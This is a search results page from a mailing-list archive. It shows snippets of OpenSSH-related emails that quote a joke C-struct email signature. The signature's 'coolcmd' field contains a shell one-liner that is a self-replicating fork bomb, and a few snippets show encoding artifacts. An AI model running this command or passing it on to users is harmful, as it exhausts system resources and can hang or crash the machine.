Displaying 4 results from an estimated 4 matches for "coolcmd".
Did you mean:
colamd
2000 Nov 22
10
Bandwidth limiting
...quot;Thomas Habets" };
char email[] = { "thomas@habets.pp.se" };
char kernel[] = { "Linux 2.2" };
char *pgpKey[] = { "finger -m thompa@darkface.pp.se" };
char pgpfinger[] = { "6517 2898 6AED EA2C 1015 DCF0 8E53 B69F 524B B541" };
char coolcmd[] = { "echo ''. ./_&. ./_''>_;. ./_" };
} me_t;
2014 Dec 24
2
[PATCH] U2F support in OpenSSH
Hey,
Judging from the (private) responses I?ve got, there is quite a bit of
interest in the U2F feature I proposed a while ago. Therefore, I?ve taken
some time to resolve the remaining issues, and I think the resulting patch
(attached to this email) is in quite a good state now.
I also posted the new version of the patch to
https://bugzilla.mindrot.org/show_bug.cgi?id=2319 (which I?ve opened
2012 Mar 22
0
TPM-protected client keys
...? ?= { "Thomas Habets" };
?char email[] ? ? = { "thomas at habets.pp.se" };
?char kernel[] ? ?= { "Linux" };
?char *pgpKey[] ? = { "http://www.habets.pp.se/pubkey.txt" };
?char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE ?0945 286A E90A AD48 E854" };
?char coolcmd[] ? = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
2015 Feb 26
4
[PATCH] U2F support in OpenSSH
...ts" };
> char email[] = { "thomas at habets.pp.se" };
> char kernel[] = { "Linux" };
> char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
> char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE 0945 286A E90A AD48 E854" };
> char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
> } me_t;
>